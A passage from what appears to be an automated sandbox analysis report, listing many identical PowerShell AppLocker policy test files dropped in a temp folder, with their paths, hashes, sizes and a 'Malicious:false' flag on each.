                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acrqnpgm.3mf.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baue0aef.wtg.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_budycvap.szq.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cbzb21a4.il2.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckoz0xl2.xth.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dc0zgmct.pi0.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_diegfg0h.jrr.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dsslqkjk.kxy.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4zgep1v.wzb.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehticxdo.r43.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ez4l2qlm.tb3.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkhbo5g3.nu3.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpfldrn4.nbr.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggxrfhhs.plr.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gh0vnpb5.to0.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4rdj1q3.shv.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5d1nhxx.0oe.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hba5vzdv.yiz.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hj0vyr2q.dw2.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idim2vji.1ia.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ili0zz3y.vus.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ir4sjtzq.233.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_is4sb1kj.gd0.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixsexrg0.cnr.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j15pujsa.wop.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2ohmudm.v2q.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jufy3cue.2xj.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
